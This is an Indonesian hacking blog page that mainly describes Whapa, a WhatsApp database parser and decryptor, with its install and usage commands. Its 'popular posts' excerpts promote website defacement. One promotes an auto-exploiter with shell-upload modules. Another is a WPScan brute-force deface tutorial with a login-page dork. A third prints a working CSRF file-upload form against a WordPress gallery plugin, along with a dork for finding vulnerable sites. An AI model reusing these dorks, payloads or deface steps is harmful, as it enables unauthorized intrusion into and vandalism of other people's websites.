Skip to main content

Whapa - Whatsapp Parser Toolset

squadcyber - Whapa adalah parser database whatsapp yang berjalan dengan otomatis. Tujuan utama dari whapa adalah menyajikan data yang ditangani oleh database Sqlite dengan cara yang dapat dipahami oleh analis. Script ditulis dengan Python 2.x
Perangkat lunak ini dibagi menjadi tiga mode:

  • Mode Pesan: Menganalisis semua pesan dalam database, menerapkan filter yang berbeda. Ini mengekstrak thumbnail ketika mereka tersedia. "./Media" adalah direktori tempat thumbnail ditulis. Baris diurutkan berdasarkan stempel waktu bukan berdasarkan id. 
  • Mode Dekripsi: Mendekripsi database crypto12 selama memiliki kunci.
  • Mode Info: Menampilkan informasi yang berbeda tentang status, daftar siaran, dan grup.
  • Extract Mode: Mengekstrak semua thumbnail dari database
Harap dicatat bahwa proyek ini adalah tahap awal. Dengan demikian, Anda dapat menemukan kesalahan. Gunakan itu dengan resiko Anda sendiri!
Bonus: Ini juga dilengkapi dengan alat untuk mengunduh salinan cadangan dari drive Google yang terkait dengan smartphone.

Cara Instal Whapa - Whatsapp Parser Toolset

$ git clone https://github.com/B16f00t/whapa.git
$ cd whapa
$ pip install -r requirements.txt

Cara Menggunakan Whapa - Whatsapp Parser Toolset

Contoh

 ("./Media" adalah direktori tempat thumbnail ditulis)
Mode pesan:
$ python whapa.py -m
Tampilkan semua pesan dari database.
$ python whapa.py -m -tS "12-12-2017 12:00" -tE "13-12-2017 12:00"
Tampilkan semua pesan dari 12-12-2017 12:00 hingga 13-12-2017 12:00.
$ python whapa.py -m -w -tI
Tampilkan semua gambar yang dikirimkan oleh Whatsapp Web.
Mode dekripsi: 

$ python whapa.py msgstore.db.crypt12 -k key
Dekripsi msgstore.dbcrypt12, membuat msgstore.db
Mode info:

$ python whapa.py -i
Tampilkan panggung dengan opsi tentang grup, daftar siaran, dan status.


Comments

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...

Deface Wordpress Bruteforce dengan WPScan

squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...